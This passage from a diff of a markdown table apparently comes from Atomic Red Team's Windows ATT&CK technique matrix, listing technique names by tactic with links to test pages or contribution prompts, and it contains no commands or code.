| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | RDP Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1551.001/T1551.001.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Control Panel](../../T1218.002/T1218.002.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Volume Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSA Secrets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | VBScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Screen Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [File Deletion](../../T1551.004/T1551.004.md) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Window](../../T1564.003/T1564.003.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Test [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1551/T1551.md) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
-| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
-| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
-| | | [Scheduled Task](../../T1053.005/T1053.005.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
-| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | |
-| | | [Screensaver](../../T1546.002/T1546.002.md) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
-| | | [Security Support Provider](../../T1547.005/T1547.005.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Connection Removal](../../T1551.005/T1551.005.md) | | | | | | | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
-| | | [Services File Permissions Weakness](../../T1574.010/T1574.010.md) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
-| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
-| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
-| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
-| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | |
+| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
